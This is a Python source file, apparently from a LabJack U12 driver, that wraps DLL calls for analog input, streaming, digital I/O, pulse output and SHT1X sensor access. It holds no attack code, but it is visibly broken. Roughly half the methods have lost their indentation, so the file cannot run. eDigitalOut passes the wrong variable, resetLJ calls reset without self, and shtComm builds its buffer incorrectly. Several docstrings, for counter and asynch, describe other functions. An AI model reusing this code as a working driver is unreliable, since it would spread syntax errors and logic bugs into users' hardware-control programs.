def eDigitalOut(self, channel, state, idNum = None, demo = 0, writeD=0):
"""
Name: U12.eDigitalOut(channel, state, idNum = None, demo = 0, writeD=0)
Args: See section 4.5 of the User's Guide
Desc: This is a simplified version of DigitalIO that sets/clears the
state of one digital output. Also configures the requested pin to
output and leaves it that way.
>>> import u12
>>> d = u12.U12()
>>> d.eDigitalOut(0, 1)
{idnum': 1}
"""
# Check id num
if idNum is None:
idNum = self.id
if ON_WINDOWS:
ljid = ctypes.c_long(idNum)
ecode = staticLib.EDigitalOut(ctypes.byref(ljid), demo, channel, writeD, state)
if ecode != 0: raise U12Exception(ecode)
return {"idnum":ljid.value}
else:
oldstate = self.rawDIO()
if writeD:
if channel > 7:
channel = channel-7
direction = BitField(rawByte = int(oldstate['D15toD8Directions']))
direction[7-channel] = 0
states = BitField(rawByte = int(oldstate['D15toD8States']))
states[7-channel] = state
self.rawDIO(D15toD8Directions = direction, D15toD8States = state, UpdateDigital = True)
else:
direction = BitField(rawByte = int(oldstate['D7toD0Directions']))
direction[7-channel] = 0
states = BitField(rawByte = int(oldstate['D7toD0States']))
states[7-channel] = state
self.rawDIO(D7toD0Directions = direction, D7toD0States = states, UpdateDigital = True)
else:
bf = BitField()
bf[7-(channel+4)] = 0
bf[7-channel] = state
self.rawDIO(IO3toIO0DirectionsAndStates = bf, UpdateDigital = True)
return {"idnum" : self.id}
def aiSample(self, numChannels, channels, idNum=None, demo=0, stateIOin=0, updateIO=0, ledOn=0, gains=[0, 0, 0, 0], disableCal=0):
"""
Name: U12.aiSample(channels, idNum=None, demo=0, stateIOin=0, updateIO=0, ledOn=0, gains=[0, 0, 0, 0], disableCal=0)
Args: See section 4.6 of the User's Guide
Desc: Reads the voltages from 1,2, or 4 analog inputs. Also controls/reads the 4 IO ports.
>>> dev = U12()
>>> dev.aiSample(2, [0, 1])
{'stateIO': [0, 0, 0, 0], 'overVoltage': 0, 'idnum': 1, 'voltages': [1.4208984375, 1.4306640625]}
"""
# Check id num
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# Check to make sure that everything is checked
if not isIterable(channels): raise TypeError("channels must be iterable")
if not isIterable(gains): raise TypeError("gains must be iterable")
if len(channels) < numChannels: raise ValueError("channels must have atleast numChannels elements")
if len(gains) < numChannels: raise ValueError("gains must have atleast numChannels elements")
# Convert lists to arrays and create other ctypes
channelsArray = listToCArray(channels, ctypes.c_long)
gainsArray = listToCArray(gains, ctypes.c_long)
overVoltage = ctypes.c_long(999)
longArrayType = (ctypes.c_long * 4)
floatArrayType = (ctypes.c_float * 4)
voltages = floatArrayType(0, 0, 0, 0)
stateIOin = ctypes.c_long(stateIOin)
ecode = staticLib.AISample(ctypes.byref(idNum), demo, ctypes.byref(stateIOin), updateIO, ledOn, numChannels, ctypes.byref(channelsArray), ctypes.byref(gainsArray), disableCal, ctypes.byref(overVoltage), ctypes.byref(voltages))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value, "stateIO":stateIOin.value, "overVoltage":overVoltage.value, "voltages":voltages[0:numChannels]}
def aiBurst(self, numChannels, channels, scanRate, numScans, idNum=None, demo=0, stateIOin=0, updateIO=0, ledOn=0, gains=[0, 0, 0, 0], disableCal=0, triggerIO=0, triggerState=0, timeout=1, transferMode=0):
"""
Name: U12.aiBurst(numChannels, channels, scanRate, numScans, idNum=None, demo=0, stateIOin=[0, 0, 0, 0], updateIO=0, ledOn=0, gains=[0, 0, 0, 0], disableCal=0, triggerIO=0, triggerState=0, timeout=1, transferMode=0)
Args: See section 4.7 of the User's Guide
Desc: Reads a specified number of scans (up to 4096) at a specified scan rate (up to 8192 Hz) from 1,2, or 4 analog inputs
>>> dev = U12()
>>> dev.aiBurst(1, [0], 400, 10)
{'overVoltage': 0, 'scanRate': 400.0, 'stateIOout': <u12.c_long_Array_4096 object at 0x00DB4BC0>, 'idnum': 1, 'voltages': <u12.c_float_Array_4096_Array_4 object at 0x00DB4B70>}
"""
# Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# check list sizes
if len(channels) < numChannels: raise ValueError("channels must have atleast numChannels elements")
if len(gains) < numChannels: raise ValueError("gains must have atleast numChannels elements")
# Convert lists to arrays and create other ctypes
channelsArray = listToCArray(channels, ctypes.c_long)
gainsArray = listToCArray(gains, ctypes.c_long)
scanRate = ctypes.c_float(scanRate)
pointerArray = (ctypes.c_void_p * 4)
arr4096_type = ctypes.c_float * 4096
voltages_type = arr4096_type * 4
voltages = voltages_type()
stateIOout = (ctypes.c_long * 4096)()
overVoltage = ctypes.c_long(999)
ecode = staticLib.AIBurst(ctypes.byref(idNum), demo, stateIOin, updateIO, ledOn, numChannels, ctypes.byref(channelsArray), ctypes.byref(gainsArray), ctypes.byref(scanRate), disableCal, triggerIO, triggerState, numScans, timeout, ctypes.byref(voltages), ctypes.byref(stateIOout), ctypes.byref(overVoltage), transferMode)
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value, "scanRate":scanRate.value, "voltages":voltages, "stateIOout":stateIOout, "overVoltage":overVoltage.value}
    def aiStreamStart(self, numChannels, channels, scanRate, idNum=None, demo=0, stateIOin=0, updateIO=0, ledOn=0, gains=[0, 0, 0, 0], disableCal=0, readCount=0):
        """
        Name: U12.aiStreamStart(numChannels, channels, scanRate, idNum=None, demo=0, stateIOin=0, updateIO=0, ledOn=0, gains=[0, 0, 0, 0], disableCal=0, readCount=0)
        Args: See section 4.8 of the User's Guide
        Desc: Starts a hardware timed continuous acquisition

        Side effects: stores the (possibly rewritten) id in self.id and sets
        self.streaming, which aiStreamRead/aiStreamClear check.

        >>> dev = U12()
        >>> dev.aiStreamStart(1, [0], 200)
        {'scanRate': 200.0, 'idnum': 1}
        """
        # The DLL returns a long error code.
        staticLib.AIStreamStart.restype = ctypes.c_long

        # Validate caller-supplied sequences before marshaling them.
        if len(channels) < numChannels: raise ValueError("channels must have atleast numChannels elements")
        if len(gains) < numChannels: raise ValueError("gains must have atleast numChannels elements")

        #if len(stateIOin) < 4: raise ValueError("stateIOin must have atleast 4 elements")

        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        channelsArray = listToCArray(channels, ctypes.c_long)
        gainsArray = listToCArray(gains, ctypes.c_long)
        scanRate = ctypes.c_float(scanRate)

        ecode = staticLib.AIStreamStart(ctypes.byref(idNum), demo, stateIOin, updateIO, ledOn, numChannels, ctypes.byref(channelsArray), ctypes.byref(gainsArray), ctypes.byref(scanRate), disableCal, 0, readCount)

        if ecode != 0: raise U12Exception(ecode)

        # The ID number must be saved for AIStreamRead/AIStreamClear.
        self.id = idNum.value
        self.streaming = True

        # scanRate comes back as the actual achieved rate.
        return {"idnum":idNum.value, "scanRate":scanRate.value}
    def aiStreamRead(self, numScans, localID=None, timeout=1):
        """
        Name: U12.aiStreamRead(numScans, localID=None, timeout=1)
        Args: See section 4.9 of the User's Guide
        Desc: Waits for a specified number of scans to be available and reads them.

        Must be preceded by a successful aiStreamStart; raises U12Exception
        otherwise.

        >>> dev = U12()
        >>> dev.aiStreamStart(1, [0], 200)
        >>> dev.aiStreamRead(10)
        {'overVoltage': 0, 'ljScanBacklog': 0, 'stateIOout': <u12.c_long_Array_4096 object at 0x00DF4AD0>, 'reserved': 0, 'voltages': <u12.c_float_Array_4096_Array_4 object at 0x00DF4B20>}
        """
        # Guard: reading before aiStreamStart would hand the DLL a stale id.
        if not self.streaming:
            raise U12Exception(-1, "Streaming has not started")

        # localID (not a byref idnum) identifies the streaming device.
        if localID is None:
            localID = self.id

        # Out-buffers for the DLL: 4 x 4096 voltage matrix plus per-scan IO
        # states; 99999/999 are sentinels the driver overwrites.
        arr4096_type = ctypes.c_float * 4096
        voltages_type = arr4096_type * 4
        voltages = voltages_type()
        stateIOout = (ctypes.c_long * 4096)()
        reserved = ctypes.c_long(0)
        ljScanBacklog = ctypes.c_long(99999)
        overVoltage = ctypes.c_long(999)

        ecode = staticLib.AIStreamRead(localID, numScans, timeout, ctypes.byref(voltages), ctypes.byref(stateIOout), ctypes.byref(reserved), ctypes.byref(ljScanBacklog), ctypes.byref(overVoltage))

        if ecode != 0: raise U12Exception(ecode)
        return {"voltages":voltages, "stateIOout":stateIOout, "reserved":reserved.value, "ljScanBacklog":ljScanBacklog.value, "overVoltage":overVoltage.value}
    def aiStreamClear(self, localID=None):
        """
        Name: U12.aiStreamClear(localID=None)
        Args: See section 4.10 of the User's Guide
        Desc: This function stops the continuous acquisition. It should be called once when finished with the stream.

        Raises U12Exception when streaming was never started or the driver
        reports an error.  NOTE(review): self.streaming is not reset to
        False here -- presumably done elsewhere; verify before relying on it.

        >>> dev = U12()
        >>> dev.aiStreamStart(1, [0], 200)
        >>> dev.aiStreamRead(10)
        >>> dev.aiStreamClear()
        """
        # Guard: nothing to stop if aiStreamStart never ran.
        if not self.streaming:
            raise U12Exception(-1, "Streaming has not started")

        # Default to the id recorded by aiStreamStart.
        if localID is None:
            localID = self.id

        ecode = staticLib.AIStreamClear(localID)

        if ecode != 0: raise U12Exception(ecode)
    def aoUpdate(self, idNum=None, demo=0, trisD=None, trisIO=None, stateD=None, stateIO=None, updateDigital=0, resetCounter=0, analogOut0=0, analogOut1=0):
        """
        Name: U12.aoUpdate()
        Args: See section 4.11 of the User's Guide
        Desc: Sets the voltages of the analog outputs. Also controls/reads all 20 digital I/O and the counter.

        When updateDigital is nonzero, trisD/trisIO/stateD/stateIO become
        mandatory keyword arguments (ValueError otherwise).

        >>> dev = U12()
        >>> dev.aoUpdate()
        >>> {'count': 2, 'stateIO': 3, 'idnum': 1, 'stateD': 0}
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        # Digital updates require explicit direction/state values so we never
        # write unintended levels to the lines.
        if updateDigital > 0:
            if trisD is None: raise ValueError("keyword argument trisD must be set")
            if trisIO is None: raise ValueError("keyword argument trisIO must be set")
            if stateD is None: raise ValueError("keyword argument stateD must be set")
            if stateIO is None: raise ValueError("keyword argument stateIO must be set")

        # When not updating, 0 placeholders are marshaled; the DLL writes the
        # current states back through these byrefs.
        if stateD is None: stateD = ctypes.c_long(0)
        else: stateD = ctypes.c_long(stateD)

        if stateIO is None: stateIO = ctypes.c_long(0)
        else: stateIO = ctypes.c_long(stateIO)

        count = ctypes.c_ushort(999)  # sentinel; overwritten by the DLL

        ecode = staticLib.AOUpdate(ctypes.byref(idNum), demo, trisD, trisIO, ctypes.byref(stateD), ctypes.byref(stateIO), updateDigital, resetCounter, ctypes.byref(count), ctypes.c_float(analogOut0), ctypes.c_float(analogOut1))

        if ecode != 0: raise U12Exception(ecode)

        return {"idnum":idNum.value, "stateD":stateD.value, "stateIO":stateIO.value, "count":count.value}
    def asynchConfig(self, fullA, fullB, fullC, halfA, halfB, halfC, idNum=None, demo=None, timeoutMult=1, configA=0, configB=0, configTE=0):
        """
        Name: U12.asynchConfig(fullA, fullB, fullC, halfA, halfB, halfC, idNum=None, demo=None, timeoutMult=1, configA=0, configB=0, configTE=0)
        Args: See section 4.12 of the User's Guide
        Desc: Requires firmware V1.1 or higher. This function writes to the asynch registers and sets the direction of the D lines (input/output) as needed.

        Raises U12Exception on a nonzero driver error code.

        >>> dev = U12()
        >>> dev.asynchConfig(96,1,1,22,2,1)
        >>> {'idNum': 1}
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        ecode = staticLib.AsynchConfig(ctypes.byref(idNum), demo, timeoutMult, configA, configB, configTE, fullA, fullB, fullC, halfA, halfB, halfC)

        if ecode != 0: raise U12Exception(ecode)

        return {"idNum":idNum.value}
def asynch(self, baudrate, data, idNum=None, demo=0, portB=0, enableTE=0, enableTO=0, enableDel=0, numWrite=0, numRead=0):
"""
Name: U12.asynchConfig(fullA, fullB, fullC, halfA, halfB, halfC, idNum=None, demo=None, timeoutMult=1, configA=0, configB=0, configTE=0)
Args: See section 4.13 of the User's Guide
Desc: Requires firmware V1.1 or higher. This function writes to the asynch registers and sets the direction of the D lines (input/output) as needed.
>>> dev = U12()
>>> dev.asynch(96,1,1,22,2,1)
>>> dev.asynch(19200, [0, 0])
>>> {'data': <u12.c_long_Array_18 object at 0x00DEFB70>, 'idnum': <type 'long'>}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# Check size of data
if len(data) > 18: raise ValueError("data can not be larger than 18 elements")
# Make data 18 elements large
dataArray = [0] * 18
for i in range(0, len(data)):
dataArray[i] = data[i]
print dataArray
dataArray = listToCArray(dataArray, ctypes.c_long)
ecode = staticLib.Asynch(ctypes.byref(idNum), demo, portB, enableTE, enableTO, enableDel, baudrate, numWrite, numRead, ctypes.byref(dataArray))
if ecode != 0: raise U12Exception(ecode) # TODO: Switch this out for exception
return {"idnum":long, "data":dataArray}
GainMapping = [ 1.0, 2.0, 4.0, 5.0, 8.0, 10.0, 16.0, 20.0 ]
def bitsToVolts(self, chnum, chgain, bits):
"""
Name: U12.bitsToVolts(chnum, chgain, bits)
Args: See section 4.14 of the User's Guide
Desc: Converts a 12-bit (0-4095) binary value into a LabJack voltage. No hardware communication is involved.
>>> dev = U12()
>>> dev.bitsToVolts(0, 0, 2662)
>>> {'volts': 2.998046875}
"""
if ON_WINDOWS:
volts = ctypes.c_float()
ecode = staticLib.BitsToVolts(chnum, chgain, bits, ctypes.byref(volts))
if ecode != 0: print ecode
return volts.value
else:
if chnum < 8:
return ( float(bits) * 20.0 / 4096.0 ) - 10.0
else:
volts = ( float(bits) * 40.0 / 4096.0 ) - 20.0
return volts / self.GainMapping[chgain]
def voltsToBits(self, chnum, chgain, volts):
"""
Name: U12.voltsToBits(chnum, chgain, bits)
Args: See section 4.15 of the User's Guide
Desc: Converts a voltage to it's 12-bit (0-4095) binary representation. No hardware communication is involved.
>>> dev = U12()
>>> dev.voltsToBits(0, 0, 3)
>>> {'bits': 2662}
"""
if ON_WINDOWS:
bits = ctypes.c_long(999)
ecode = staticLib.VoltsToBits(chnum, chgain, ctypes.c_float(volts), ctypes.byref(bits))
if ecode != 0: raise U12Exception(ecode)
return bits.value
else:
pass
#*bits = RoundFL((volts+10.0F)/(20.0F/4096.0F));
def counter(self, idNum=None, demo=0, resetCounter=0, enableSTB=1):
"""
Name: U12.counter(idNum=None, demo=0, resetCounter=0, enableSTB=1)
Args: See section 4.15 of the User's Guide
Desc: Converts a voltage to it's 12-bit (0-4095) binary representation. No hardware communication is involved.
>>> dev = U12()
>>> dev.counter(0, 0, 3)
>>> {'bits': 2662}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# Create ctypes
stateD = ctypes.c_long(999)
stateIO = ctypes.c_long(999)
count = ctypes.c_ulong(999)
print idNum
ecode = staticLib.Counter(ctypes.byref(idNum), demo, ctypes.byref(stateD), ctypes.byref(stateIO), resetCounter, enableSTB, ctypes.byref(count))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value, "stateD": stateD.value, "stateIO":stateIO.value, "count":count.value}
    def digitalIO(self, idNum=None, demo=0, trisD=None, trisIO=None, stateD=None, stateIO=None, updateDigital=0):
        """
        Name: U12.digitalIO(idNum=None, demo=0, trisD=None, trisIO=None, stateD=None, stateIO=None, updateDigital=0)
        Args: See section 4.17 of the User's Guide
        Desc: Reads and writes to all 20 digital I/O.

        When updateDigital is nonzero, trisD/trisIO/stateD/stateIO become
        mandatory keyword arguments (ValueError otherwise).

        >>> dev = U12()
        >>> dev.digitalIO()
        >>> {'stateIO': 0, 'stateD': 0, 'idnum': 1, 'outputD': 0, 'trisD': 0}
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        # Writes require explicit direction/state values so we never drive
        # unintended levels onto the lines.
        if updateDigital > 0:
            if trisD is None: raise ValueError("keyword argument trisD must be set")
            if trisIO is None: raise ValueError("keyword argument trisIO must be set")
            if stateD is None: raise ValueError("keyword argument stateD must be set")
            if stateIO is None: raise ValueError("keyword argument stateIO must be set")

        # Read-only path: marshal placeholders the DLL overwrites.
        # NOTE(review): trisD/stateD default to the 999 sentinel but stateIO
        # defaults to 0 -- looks inconsistent; confirm against the DLL docs.
        if trisD is None: trisD = ctypes.c_long(999)
        else: trisD = ctypes.c_long(trisD)

        if stateD is None: stateD = ctypes.c_long(999)
        else: stateD = ctypes.c_long(stateD)

        if stateIO is None: stateIO = ctypes.c_long(0)
        else: stateIO = ctypes.c_long(stateIO)

        outputD = ctypes.c_long(999)

        # trisIO is passed by value, not by reference.
        if trisIO is None: trisIO = 0

        ecode = staticLib.DigitalIO(ctypes.byref(idNum), demo, ctypes.byref(trisD), trisIO, ctypes.byref(stateD), ctypes.byref(stateIO), updateDigital, ctypes.byref(outputD))

        if ecode != 0: raise U12Exception(ecode)

        return {"idnum":idNum.value, "trisD":trisD.value, "stateD":stateD.value, "stateIO":stateIO.value, "outputD":outputD.value}
    def getDriverVersion(self):
        """
        Name: U12.getDriverVersion()
        Args: See section 4.18 of the User's Guide
        Desc: Returns the version number of ljackuw.dll. No hardware communication is involved.

        >>> dev = U12()
        >>> dev.getDriverVersion()
        >>> 1.21000003815
        """
        # The DLL returns a float, so the default int restype must be
        # overridden before calling.
        staticLib.GetDriverVersion.restype = ctypes.c_float
        return staticLib.GetDriverVersion()
    def getFirmwareVersion(self, idNum=None):
        """
        Name: U12.getFirmwareVersion(idNum=None)
        Args: See section 4.20 of the User's Guide
        Desc: Retrieves the firmware version from the LabJack's processor

        Raises U12Exception when the driver reports an error (encoded as
        firmware value > 512).

        >>> dev = U12()
        >>> dev.getFirmwareVersion()
        >>> {'idnum': 1, 'firmware': 1.1}
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None: idNum = self.id
        idNum = ctypes.c_long(idNum)

        staticLib.GetFirmwareVersion.restype = ctypes.c_float
        firmware = staticLib.GetFirmwareVersion(ctypes.byref(idNum))

        # Per the driver's convention, values above 512 are (error + 512).
        if firmware > 512: raise U12Exception(firmware-512)

        return {"idnum" : idNum.value, "firmware" : firmware}
    def getWinVersion(self):
        """
        Name: U12.getWinVersion()
        Args: See section 4.21 of the User's Guide
        Desc: Uses a Windows API function to get the OS version

        >>> dev = U12()
        >>> dev.getWinVersion()
        >>> {'majorVersion': 5L, 'minorVersion': 1L, 'platformID': 2L, 'buildNumber': 2600L, 'servicePackMajor': 2L, 'servicePackMinor': 0L}
        """
        # All six values are out-parameters filled in by the DLL.
        majorVersion = ctypes.c_ulong()
        minorVersion = ctypes.c_ulong()
        buildNumber = ctypes.c_ulong()
        platformID = ctypes.c_ulong()
        servicePackMajor = ctypes.c_ulong()
        servicePackMinor = ctypes.c_ulong()

        ecode = staticLib.GetWinVersion(ctypes.byref(majorVersion), ctypes.byref(minorVersion), ctypes.byref(buildNumber), ctypes.byref(platformID), ctypes.byref(servicePackMajor), ctypes.byref(servicePackMinor))

        if ecode != 0: raise U12Exception(ecode)

        return {"majorVersion":majorVersion.value, "minorVersion":minorVersion.value, "buildNumber":buildNumber.value, "platformID":platformID.value, "servicePackMajor":servicePackMajor.value, "servicePackMinor":servicePackMinor.value}
    def listAll(self):
        """
        Name: U12.listAll()
        Args: See section 4.22 of the User's Guide
        Desc: Searches the USB for all LabJacks, and returns the serial number and local ID for each

        >>> dev = U12()
        >>> dev.listAll()
        >>> {'serialnumList': <u12.c_long_Array_127 object at 0x00E2AD50>, 'numberFound': 1, 'localIDList': <u12.c_long_Array_127 object at 0x00E2ADA0>}
        """
        # The DLL fills fixed 127-entry tables (one slot per possible
        # device) plus a 20 x 127 calibration matrix.
        productIDList = listToCArray([0]*127, ctypes.c_long)
        serialnumList = listToCArray([0]*127, ctypes.c_long)
        localIDList = listToCArray([0]*127, ctypes.c_long)
        powerList = listToCArray([0]*127, ctypes.c_long)
        arr127_type = ctypes.c_long * 127
        calMatrix_type = arr127_type * 20
        calMatrix = calMatrix_type()
        reserved = ctypes.c_long()
        numberFound = ctypes.c_long()

        # NOTE(review): the same ``reserved`` object is passed for both
        # reserved byref slots -- appears intentional; confirm against the
        # ListAll prototype.
        ecode = staticLib.ListAll(ctypes.byref(productIDList), ctypes.byref(serialnumList), ctypes.byref(localIDList), ctypes.byref(powerList), ctypes.byref(calMatrix), ctypes.byref(numberFound), ctypes.byref(reserved), ctypes.byref(reserved))

        if ecode != 0: raise U12Exception(ecode)

        # Only the first numberFound entries of each list are meaningful.
        return {"serialnumList": serialnumList, "localIDList":localIDList, "numberFound":numberFound.value}
    def localID(self, localID, idNum=None):
        """
        Name: U12.localID(localID, idNum=None)
        Args: See section 4.23 of the User's Guide
        Desc: Changes the local ID of a specified LabJack

        >>> dev = U12()
        >>> dev.localID(1)
        >>> {'idnum':1}
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        ecode = staticLib.LocalID(ctypes.byref(idNum), localID)
        if ecode != 0: raise U12Exception(ecode)

        return {"idnum":idNum.value}
    def noThread(self, noThread, idNum=None):
        """
        Name: U12.noThread(noThread, idNum=None)
        Args: See section 4.24 of the User's Guide
        Desc: This function is needed when interfacing TestPoint to the LabJack DLL on Windows 98/ME

        >>> dev = U12()
        >>> dev.noThread(1)
        >>> {'idnum':1}
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        ecode = staticLib.NoThread(ctypes.byref(idNum), noThread)
        if ecode != 0: raise U12Exception(ecode)

        return {"idnum":idNum.value}
    def pulseOut(self, bitSelect, numPulses, timeB1, timeC1, timeB2, timeC2, idNum=None, demo=0, lowFirst=0):
        """
        Name: U12.pulseOut(bitSelect, numPulses, timeB1, timeC1, timeB2, timeC2, idNum=None, demo=0, lowFirst=0)
        Args: See section 4.25 of the User's Guide
        Desc: This command creates pulses on any/all of D0-D7

        Blocks until the pulses finish; see pulseOutStart/pulseOutFinish
        for the non-blocking variant, and pulseOutCalc for the B/C times.

        >>> dev = U12()
        >>> dev.pulseOut(0, 1, 1, 1, 1, 1)
        >>> {'idnum':1}
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        ecode = staticLib.PulseOut(ctypes.byref(idNum), demo, lowFirst, bitSelect, numPulses, timeB1, timeC1, timeB2, timeC2)
        if ecode != 0: raise U12Exception(ecode)

        return {"idnum":idNum.value}
    def pulseOutStart(self, bitSelect, numPulses, timeB1, timeC1, timeB2, timeC2, idNum=None, demo=0, lowFirst=0):
        """
        Name: U12.pulseOutStart(bitSelect, numPulses, timeB1, timeC1, timeB2, timeC2, idNum=None, demo=0, lowFirst=0)
        Args: See section 4.26 of the User's Guide
        Desc: PulseOutStart and PulseOutFinish are used as an alternative to PulseOut (See PulseOut for more information)

        Returns immediately; pair with pulseOutFinish to wait for completion.

        >>> dev = U12()
        >>> dev.pulseOutStart(0, 1, 1, 1, 1, 1)
        >>> {'idnum':1}
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        ecode = staticLib.PulseOutStart(ctypes.byref(idNum), demo, lowFirst, bitSelect, numPulses, timeB1, timeC1, timeB2, timeC2)
        if ecode != 0: raise U12Exception(ecode)

        return {"idnum":idNum.value}
    def pulseOutFinish(self, timeoutMS, idNum=None, demo=0):
        """
        Name: U12.pulseOutFinish(timeoutMS, idNum=None, demo=0)
        Args: See section 4.27 of the User's Guide
        Desc: See PulseOutStart for more information

        Waits up to timeoutMS milliseconds for a pulse train started by
        pulseOutStart to complete.

        >>> dev = U12()
        >>> dev.pulseOutStart(0, 1, 1, 1, 1, 1)
        >>> dev.pulseOutFinish(100)
        >>> {'idnum':1}
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        ecode = staticLib.PulseOutFinish(ctypes.byref(idNum), demo, timeoutMS)
        if ecode != 0: raise U12Exception(ecode)

        return {"idnum":idNum.value}
    def pulseOutCalc(self, frequency):
        """
        Name: U12.pulseOutCalc(frequency)
        Args: See section 4.28 of the User's Guide
        Desc: This function can be used to calculate the cycle times for PulseOut or PulseOutStart.

        No hardware communication; the returned 'frequency' is the actual
        achievable frequency for the computed B/C times.

        >>> dev = U12()
        >>> dev.pulseOutCalc(100)
        >>> {'frequency': 100.07672882080078, 'timeB': 247, 'timeC': 1}
        """
        # frequency is in/out: the DLL rewrites it with the achievable value.
        frequency = ctypes.c_float(frequency)
        timeB = ctypes.c_long(0)
        timeC = ctypes.c_long(0)

        ecode = staticLib.PulseOutCalc(ctypes.byref(frequency), ctypes.byref(timeB), ctypes.byref(timeC))
        if ecode != 0: raise U12Exception(ecode)

        return {"frequency":frequency.value, "timeB":timeB.value, "timeC":timeC.value}
    def reEnum(self, idNum=None):
        """
        Name: U12.reEnum(idNum=None)
        Args: See section 4.29 of the User's Guide
        Desc: Causes the LabJack to electrically detach from and re-attach to the USB so it will re-enumerate

        >>> dev = U12()
        >>> dev.reEnum()
        >>> {'idnum': 1}
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        ecode = staticLib.ReEnum(ctypes.byref(idNum))
        if ecode != 0: raise U12Exception(ecode)

        return {"idnum":idNum.value}
    def reset(self, idNum=None):
        """
        Name: U12.reset(idNum=None)
        Args: See section 4.30 of the User's Guide
        Desc: Causes the LabJack to reset after about 2 seconds

        >>> dev = U12()
        >>> dev.reset()
        >>> {'idnum': 1}
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        ecode = staticLib.Reset(ctypes.byref(idNum))
        if ecode != 0: raise U12Exception(ecode)

        return {"idnum":idNum.value}
def resetLJ(self, idNum=None):
"""
Name: U12.resetLJ(idNum=None)
Args: See section 4.30 of the User's Guide
Desc: Causes the LabJack to reset after about 2 seconds
>>> dev = U12()
>>> dev.resetLJ()
>>> {'idnum': 1}
"""
return reset(idNum)
    def sht1X(self, idNum=None, demo=0, softComm=0, mode=0, statusReg=0):
        """
        Name: U12.sht1X(idNum=None, demo=0, softComm=0, mode=0, statusReg=0)
        Args: See section 4.31 of the User's Guide
        Desc: This function retrieves temperature and/or humidity readings from an SHT1X sensor.

        >>> dev = U12()
        >>> dev.sht1X()
        >>> {'tempC': 24.69999885559082, 'rh': 39.724445343017578, 'idnum': 1, 'tempF': 76.459999084472656}
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        # Out-parameters the DLL fills with the sensor readings.
        tempC = ctypes.c_float(0)
        tempF = ctypes.c_float(0)
        rh = ctypes.c_float(0)

        ecode = staticLib.SHT1X(ctypes.byref(idNum), demo, softComm, mode, statusReg, ctypes.byref(tempC), ctypes.byref(tempF), ctypes.byref(rh))
        if ecode != 0: raise U12Exception(ecode)

        return {"idnum":idNum.value, "tempC":tempC.value, "tempF":tempF.value, "rh":rh.value}
def shtComm(self, numWrite, numRead, datatx, idNum=None, softComm=0, waitMeas=0, serialReset=0, dataRate=0):
"""
Name: U12.shtComm(numWrite, numRead, datatx, idNum=None, softComm=0, waitMeas=0, serialReset=0, dataRate=0)
Args: See section 4.32 of the User's Guide
Desc: Low-level public function to send and receive up to 4 bytes to from an SHT1X sensor
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# Check size of datatx
if len(datatx) != 4: raise ValueError("datatx must have exactly 4 elements")
# Create ctypes
datatx = listToCArray(datatx, ctypes.c_ubyte)
datarx = (ctypes.c_ubyte * 4)((0) * 4)
ecode = staticLib.SHTComm(ctypes.byref(idNum), softComm, waitMeas, serialReset, dataRate, numWrite, numRead, ctypes.byref(datatx), ctypes.byref(datarx))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value, "datarx":datarx}
    def shtCRC(self, numWrite, numRead, datatx, datarx, statusReg=0):
        """
        Name: U12.shtCRC(numWrite, numRead, datatx, datarx, statusReg=0)
        Args: See section 4.33 of the User's Guide
        Desc: Checks the CRC on an SHT1X communication

        Returns the DLL's result directly; unlike the other wrappers, the
        return value is not translated into a U12Exception.
        """
        # Marshal both byte buffers for the DLL.
        datatx = listToCArray(datatx, ctypes.c_ubyte)
        datarx = listToCArray(datarx, ctypes.c_ubyte)

        return staticLib.SHTCRC(statusReg, numWrite, numRead, ctypes.byref(datatx), ctypes.byref(datarx))
    def synch(self, mode, numWriteRead, data, idNum=None, demo=0, msDelay=0, husDelay=0, controlCS=0, csLine=None, csState=0, configD=0):
        """
        Name: U12.synch(mode, numWriteRead, data, idNum=None, demo=0, msDelay=0, husDelay=0, controlCS=0, csLine=None, csState=0, configD=0)
        Args: See section 4.34 of the User's Guide
        Desc: Performs SPI-style synchronous communication through the
              driver's Synch call.

        Raises ValueError when controlCS is set without csLine, and
        U12Exception on a nonzero driver error code.
        """
        # Fall back to this device's local id; passed by reference below.
        if idNum is None:
            idNum = self.id
        idNum = ctypes.c_long(idNum)

        # Chip-select control needs to know which line to drive.
        if controlCS > 0 and csLine is None: raise ValueError("csLine must be specified")

        # The DLL expects exactly 18 data elements; zero-pad the caller's
        # list into a fixed-size buffer.
        cData = [0] * 18
        for i in range(0, len(data)):
            cData[i] = data[i]
        cData = listToCArray(cData, ctypes.c_long)

        ecode = staticLib.Synch(ctypes.byref(idNum), demo, mode, msDelay, husDelay, controlCS, csLine, csState, configD, numWriteRead, ctypes.byref(cData))
        if ecode != 0: raise U12Exception(ecode)

